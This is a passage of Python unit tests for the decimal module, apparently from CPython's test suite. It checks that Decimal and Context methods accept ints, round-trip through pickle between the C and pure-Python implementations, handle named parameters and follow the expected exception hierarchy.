self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
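# create_decimal_from_float, by contrast, applies the context: the value is
# rounded to ``prec`` digits and Inexact is signalled (and can be trapped).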
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
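# Most Decimal methods accept their operands and the context as keyword
# arguments; the expected values below assume the tiny context
# prec=1, Emax=1, Emin=-1 set up on ``xc``.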
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
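# The signals form a hierarchy rooted at DecimalException (an
# ArithmeticError); some also inherit from a matching builtin, e.g.
# DivisionByZero from ZeroDivisionError and FloatOperation from TypeError.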
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
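# ContextAPItests checks every arithmetic Context method with the same
# pattern: ints are accepted wherever a Decimal is, the result equals the
# pure-Decimal call, and strings (or other junk) raise TypeError.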
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
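# Context objects pickle across implementations too; prec, Emin/Emax,
# rounding, capitals, clamp and the flag/trap dictionaries must all survive.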
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
